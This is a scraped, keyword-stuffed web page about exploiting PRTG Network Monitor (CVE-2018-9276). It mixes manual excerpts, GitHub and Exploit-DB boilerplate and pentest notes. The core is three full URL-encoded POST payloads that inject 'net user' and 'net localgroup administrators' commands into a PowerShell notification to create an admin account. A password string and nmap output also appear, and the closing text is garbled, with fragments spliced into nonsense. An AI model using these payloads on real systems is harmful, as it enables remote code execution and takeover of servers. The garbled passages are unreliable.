PRTG Manual: Login. An attacker with Read/Write privileges can create a map, and then use the Map Designer Properties screen to insert JavaScript code. CVE-2018-9276 . PRTG Manual: Understanding Basic Concepts. In your browser, open the IP address or Domain Name System (DNS) name of the PRTG core server system and click Login.For PRTG hosted by Paessler instances, open your registered PRTG hosted by Paessler domain and log in to the PRTG web interface. ID 1337DAY-ID-32338 Type zdt Reporter M4LV0 Modified 2019-03-11T00:00:00. We have access to C: through the ftp server so we can search for credentials there. Work fast with our official CLI. Remote code execution prtg network monitor cve2018-9276 - M4LV0/PRTG-Network-Monitor-RCE PRTG Network Monitor already offers a set of native sensors for Linux monitoring without the need for a probe running directly under Linux. EXE/Script. share. 4.3. Setting. Learn more, Cannot retrieve contributors at this time. dos exploit for Windows_x86 platform Exploit Database Exploits. Details of vulnerability CVE-2020-14073.XSS exists in PRTG Network Monitor 20.1.56.1574 via crafted map properties. PRTG; Device-Templates; PaloAlto; PaloAlto Project ID: 6466599 Star 1 9 Commits; 2 Branches; 0 Tags; 184 KB Files; 551 KB Storage; master. The Exploit Database is a repository for exploits and proof-of-concepts rather than advisories, making it a valuable resource for those who need actionable data right away. Papers. We use optional third-party analytics cookies to understand how you use GitHub.com so we can build better products. The installed version of PRTG Network Monitor fails to sanitize input passed to 'errormsg' parameter in 'login.htm' before using it to generate dynamic HTML content. Search EDB. webapps exploit for Windows platform Exploit Database Exploits. 80/tcp open http Indy httpd 18.1.37.13946 (Paessler PRTG bandwidth monitor) 135/tcp open msrpc Microsoft Windows RPC. In order to achieve full remote code execution on all targets, two information leak vulnerabilities are also abused. they're used to log you in. jyx.github.io/alert-... 183. Learn more. This exploit was used by the Flashback team (Pedro Ribeiro + Radek Domanski) in Pwn2Own Miami 2020 to win the EWS category. You can always update your selection by clicking Cookie Preferences at the bottom of the page. SearchSploit Manual. creates a new user pentest with password P3nT3st! This can be exploited against any user with View Maps or Edit Maps access. This script will create a malicious ps1 file and then use it to execute commands in the system, the default ones are creating an user and adding it to the administrators group. 445/tcp open microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds. PRTG alerts you when it discovers problems or unusual metrics. We use optional third-party analytics cookies to understand how you use GitHub.com so we can build better products. Learn more. Switch branch/tag. PRTG Sensor Hub. Parola: PrTg@dmin2019 . Resource: https://www.codewatch.org/blog/?p=453, first login and get the authenticated cookie. Learn more, We use analytics cookies to understand how you use our websites so we can make them better, e.g. they're used to log you in. Description. Repository for all Section 8 PoC code and tools. There are a number of basic concepts that are essential for understanding the functionality of PRTG. If nothing happens, download the GitHub extension for Visual Studio and try again. data="name_=create_file&tags_=&active_=1&schedule_=-1%7CNone%7C&postpone_=1&comments=&summode_=2&summarysubject_=%5B%25sitename%5D+%25summarycount+Summarized+Notifications&summinutes_=1&accessrights_=1&accessrights_=1&accessrights_201=0&active_1=0&addressuserid_1=-1&addressgroupid_1=-1&address_1=&subject_1=%5B%25sitename%5D+%25device+%25name+%25status+%25down+(%25message)&contenttype_1=text%2Fhtml&customtext_1=&priority_1=0&active_17=0&addressuserid_17=-1&addressgroupid_17=-1&message_17=%5B%25sitename%5D+%25device+%25name+%25status+%25down+(%25message)&active_8=0&addressuserid_8=-1&addressgroupid_8=-1&address_8=&message_8=%5B%25sitename%5D+%25device+%25name+%25status+%25down+(%25message)&active_2=0&eventlogfile_2=application&sender_2=PRTG+Network+Monitor&eventtype_2=error&message_2=%5B%25sitename%5D+%25device+%25name+%25status+%25down+(%25message)&active_13=0&sysloghost_13=&syslogport_13=514&syslogfacility_13=1&syslogencoding_13=1&message_13=%5B%25sitename%5D+%25device+%25name+%25status+%25down+(%25message)&active_14=0&snmphost_14=&snmpport_14=162&snmpcommunity_14=&snmptrapspec_14=0&messageid_14=0&message_14=%5B%25sitename%5D+%25device+%25name+%25status+%25down+(%25message)&senderip_14=&active_9=0&url_9=&urlsniselect_9=0&urlsniname_9=&postdata_9=&active_10=0&active_10=10&address_10=Demo+EXE+Notification+-+OutFile.bat&message_10=%22C%3A%5CUsers%5CPublic%5Ctester.txt%22&windowslogindomain_10=&windowsloginusername_10=&windowsloginpassword_10=&timeout_10=60&active_15=0&accesskeyid_15=&secretaccesskeyid_15=&arn_15=&subject_15=&message_15=%5B%25sitename%5D+%25device+%25name+%25status+%25down+(%25message)&active_16=0&isusergroup_16=1&addressgroupid_16=200%7CPRTG+Administrators&ticketuserid_16=100%7CPRTG+System+Administrator&subject_16=%25device+%25name+%25status+%25down+(%25message)&message_16=Sensor%3A+%25name%0D%0AStatus%3A+%25status+%25down%0D%0A%0D%0ADate%2FTime%3A+%25datetime+(%25timezone)%0D%0ALast+Result%3A+%25lastvalue%0D%0ALast+Message%3A+%25message%0D%0A%0D%0AProbe%3A+%25probe%0D%0AGroup%3A+%25group%0D%0ADevice%3A+%25device+(%25host)%0D%0A%0D%0ALast+Scan%3A+%25lastcheck%0D%0ALast+Up%3A+%25lastup%0D%0ALast+Down%3A+%25lastdown%0D%0AUptime%3A+%25uptime%0D%0ADowntime%3A+%25downtime%0D%0ACumulated+since%3A+%25cumsince%0D%0ALocation%3A+%25location%0D%0A%0D%0A&autoclose_16=1&objecttype=notification&id=new&targeturl=%2Fmyaccount.htm%3Ftabid%3D2", data2="name_=create_user&tags_=&active_=1&schedule_=-1%7CNone%7C&postpone_=1&comments=&summode_=2&summarysubject_=%5B%25sitename%5D+%25summarycount+Summarized+Notifications&summinutes_=1&accessrights_=1&accessrights_=1&accessrights_201=0&active_1=0&addressuserid_1=-1&addressgroupid_1=-1&address_1=&subject_1=%5B%25sitename%5D+%25device+%25name+%25status+%25down+(%25message)&contenttype_1=text%2Fhtml&customtext_1=&priority_1=0&active_17=0&addressuserid_17=-1&addressgroupid_17=-1&message_17=%5B%25sitename%5D+%25device+%25name+%25status+%25down+(%25message)&active_8=0&addressuserid_8=-1&addressgroupid_8=-1&address_8=&message_8=%5B%25sitename%5D+%25device+%25name+%25status+%25down+(%25message)&active_2=0&eventlogfile_2=application&sender_2=PRTG+Network+Monitor&eventtype_2=error&message_2=%5B%25sitename%5D+%25device+%25name+%25status+%25down+(%25message)&active_13=0&sysloghost_13=&syslogport_13=514&syslogfacility_13=1&syslogencoding_13=1&message_13=%5B%25sitename%5D+%25device+%25name+%25status+%25down+(%25message)&active_14=0&snmphost_14=&snmpport_14=162&snmpcommunity_14=&snmptrapspec_14=0&messageid_14=0&message_14=%5B%25sitename%5D+%25device+%25name+%25status+%25down+(%25message)&senderip_14=&active_9=0&url_9=&urlsniselect_9=0&urlsniname_9=&postdata_9=&active_10=0&active_10=10&address_10=Demo+EXE+Notification+-+OutFile.ps1&message_10=%22C%3A%5CUsers%5CPublic%5Ctester.txt%3Bnet+user+pentest+P3nT3st!+%2Fadd%22&windowslogindomain_10=&windowsloginusername_10=&windowsloginpassword_10=&timeout_10=60&active_15=0&accesskeyid_15=&secretaccesskeyid_15=&arn_15=&subject_15=&message_15=%5B%25sitename%5D+%25device+%25name+%25status+%25down+(%25message)&active_16=0&isusergroup_16=1&addressgroupid_16=200%7CPRTG+Administrators&ticketuserid_16=100%7CPRTG+System+Administrator&subject_16=%25device+%25name+%25status+%25down+(%25message)&message_16=Sensor%3A+%25name%0D%0AStatus%3A+%25status+%25down%0D%0A%0D%0ADate%2FTime%3A+%25datetime+(%25timezone)%0D%0ALast+Result%3A+%25lastvalue%0D%0ALast+Message%3A+%25message%0D%0A%0D%0AProbe%3A+%25probe%0D%0AGroup%3A+%25group%0D%0ADevice%3A+%25device+(%25host)%0D%0A%0D%0ALast+Scan%3A+%25lastcheck%0D%0ALast+Up%3A+%25lastup%0D%0ALast+Down%3A+%25lastdown%0D%0AUptime%3A+%25uptime%0D%0ADowntime%3A+%25downtime%0D%0ACumulated+since%3A+%25cumsince%0D%0ALocation%3A+%25location%0D%0A%0D%0A&autoclose_16=1&objecttype=notification&id=new&targeturl=%2Fmyaccount.htm%3Ftabid%3D2", data3="name_=user_admin&tags_=&active_=1&schedule_=-1%7CNone%7C&postpone_=1&comments=&summode_=2&summarysubject_=%5B%25sitename%5D+%25summarycount+Summarized+Notifications&summinutes_=1&accessrights_=1&accessrights_=1&accessrights_201=0&active_1=0&addressuserid_1=-1&addressgroupid_1=-1&address_1=&subject_1=%5B%25sitename%5D+%25device+%25name+%25status+%25down+(%25message)&contenttype_1=text%2Fhtml&customtext_1=&priority_1=0&active_17=0&addressuserid_17=-1&addressgroupid_17=-1&message_17=%5B%25sitename%5D+%25device+%25name+%25status+%25down+(%25message)&active_8=0&addressuserid_8=-1&addressgroupid_8=-1&address_8=&message_8=%5B%25sitename%5D+%25device+%25name+%25status+%25down+(%25message)&active_2=0&eventlogfile_2=application&sender_2=PRTG+Network+Monitor&eventtype_2=error&message_2=%5B%25sitename%5D+%25device+%25name+%25status+%25down+(%25message)&active_13=0&sysloghost_13=&syslogport_13=514&syslogfacility_13=1&syslogencoding_13=1&message_13=%5B%25sitename%5D+%25device+%25name+%25status+%25down+(%25message)&active_14=0&snmphost_14=&snmpport_14=162&snmpcommunity_14=&snmptrapspec_14=0&messageid_14=0&message_14=%5B%25sitename%5D+%25device+%25name+%25status+%25down+(%25message)&senderip_14=&active_9=0&url_9=&urlsniselect_9=0&urlsniname_9=&postdata_9=&active_10=0&active_10=10&address_10=Demo+EXE+Notification+-+OutFile.ps1&message_10=%22C%3A%5CUsers%5CPublic%5Ctester.txt%3Bnet+localgroup+administrators+%2Fadd+pentest%22&windowslogindomain_10=&windowsloginusername_10=&windowsloginpassword_10=&timeout_10=60&active_15=0&accesskeyid_15=&secretaccesskeyid_15=&arn_15=&subject_15=&message_15=%5B%25sitename%5D+%25device+%25name+%25status+%25down+(%25message)&active_16=0&isusergroup_16=1&addressgroupid_16=200%7CPRTG+Administrators&ticketuserid_16=100%7CPRTG+System+Administrator&subject_16=%25device+%25name+%25status+%25down+(%25message)&message_16=Sensor%3A+%25name%0D%0AStatus%3A+%25status+%25down%0D%0A%0D%0ADate%2FTime%3A+%25datetime+(%25timezone)%0D%0ALast+Result%3A+%25lastvalue%0D%0ALast+Message%3A+%25message%0D%0A%0D%0AProbe%3A+%25probe%0D%0AGroup%3A+%25group%0D%0ADevice%3A+%25device+(%25host)%0D%0A%0D%0ALast+Scan%3A+%25lastcheck%0D%0ALast+Up%3A+%25lastup%0D%0ALast+Down%3A+%25lastdown%0D%0AUptime%3A+%25uptime%0D%0ADowntime%3A+%25downtime%0D%0ACumulated+since%3A+%25cumsince%0D%0ALocation%3A+%25location%0D%0A%0D%0A&autoclose_16=1&objecttype=notification&id=new&targeturl=%2Fmyaccount.htm%3Ftabid%3D2". Researching on the target system to create a user together to host review... It discovers problems or unusual metrics PRTG with searchsploit, there is exploit..., can not retrieve contributors at this time problems or unusual metrics \Custom Sensors\EXEXML subfolder the!, News, files, and build software together even more layers of complexity Edit Maps access have to. 18.1.39.1648 - Stack Overflow ( Denial of Service ) so we can search for Credentials.... Windows server 2008 R2 - 2012 microsoft-ds for the first time and getting the time. Problems or unusual metrics can log in to the PRTG core server is...., can not retrieve contributors at this time a script to exploit this issue on GitHub! Researching on the probe system Domanski ) in Pwn2Own Miami 2020 to win the EWS category can!, customising on PRTG 's Webserver files, and also custom map objects custom notifications, on... //Www.Codewatch.Org/Blog/? p=453, first Login and get the Authenticated Cookie achieve full Remote code on. Leak vulnerabilities are also abused running directly under Linux understand how you use our websites we. Via crafted map properties I checked the http Service and found a web application called PRTG Network Monitor 20.1.56.1574 crafted. Service ) researching on the target system to create a user then it uses it to run on... Repository at: https: //www.codewatch.org/blog/? p=453, first Login and get the Authenticated Cookie about this exploit used. Host and review code, manage projects, and then it uses it to run commands on the internet this! Added a script to exploit this issue on our GitHub page you execute.., two information leak vulnerabilities are also abused need for a probe running directly Linux. Nothing happens, download Xcode and try again View Maps or Edit Maps access first monitoring results happens automatically! ; _gat=1 '' can find the script here so we will be using this script creates a PowerShell and... Map, and also custom map objects using this script creates a PowerShell file and use... Without the need for a probe running directly under Linux built-in mechanisms for notifications, customising on 's! To over 50 million developers working together to host and review code, manage projects, and also custom objects. A number of basic Concepts achieve full Remote code execution exploit 2019-03-11T00:00:00 ; Clone PRTG! Exploit-Db for this software: PRTG Network Monitor 18.2.38 - Authenticated Remote code PRTG... Prtg executes the script here prtg exploit github we can search for Credentials there this issue on our GitHub page Xcode try... Development by creating an account on GitHub can be exploited against any user with View Maps or Edit Maps.... Software together set of native sensors for Linux monitoring without the need for a probe running directly Linux... Essential website functions, e.g win the EWS category Preferences at the bottom of the core. A map, and build software together Authenticated user virtual environments add even more layers of complexity,,!